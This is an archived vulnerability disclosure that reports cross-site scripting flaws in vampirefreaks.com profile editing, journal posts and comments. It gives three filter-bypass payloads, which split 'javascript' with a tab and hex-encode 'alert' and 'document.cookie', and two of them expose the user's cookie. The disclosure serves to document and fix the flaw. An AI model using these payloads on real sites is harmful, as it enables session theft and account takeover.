TUCoPS :: Web :: Specific Sites :: b06-2932.htm

Vampirefreaks.com - XSS with cookie disclosure
Vampirefreaks.com - XSS with cookie disclosure
Vampirefreaks.com - XSS with cookie disclosure


Vampirefreaks.com=0D
=0D
Homepage:=0D
http://www.vampirefreaks.com=0D 
=0D
Effected files:=0D
input boxes of editing your profile=0D
posting a journal entry.=0D
Commenting=0D
=0D
XSS Vulnerability:=0D
=0D
Data isn't properly filtered when editing your profile. One way to bypass the filter is to escape quotes and useclosing  brackets withaimg tag while having tab enabled and spacing jav    ascript:  Javascript and alert are filtered to the words  "forbidden" so to bypass this we convert the word alert to hex form. Try adding the following below in your profile:=0D
=0D
']"]'][""]'][IMG SRC="jav	ascript:%61%6C%65%72%74('XSS');"]['["[""]['[""] =0D
=0D
XSS Vulnerability to disclose user cookie:=0D
=0D
This time, much like the sameway above, we have to hex encode alert and document.cookie because both words also  get filtered to forbidden. PoC, add this in your profile, and make sure tab is on.=0D
PoC:=0D
']"]'][""]'][IMG SRC="jav	ascript:%61%6C%65%72%74(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65)" ]['["[""]['[""] =0D
=0D
-------------------------------=0D
=0D
XSS Vuln to disclose cookie in posting a journal entry:=0D
=0D
Same method as above works here too:=0D
=0D
']"]'][""]'][IMG SRC="jav	ascript:%61%6C%65%72%74(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65)" ]['["[""]['[""] =0D
=0D
----------------------------------=0D
=0D
Screenshots of XSS vulns:=0D
=0D
http://www.youfucktard.com/xsp/vf1.jpg=0D 
http://www.youfucktard.com/xsp/vf2.jpg=0D 
http://www.youfucktard.com/xsp/vf3.jpg

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH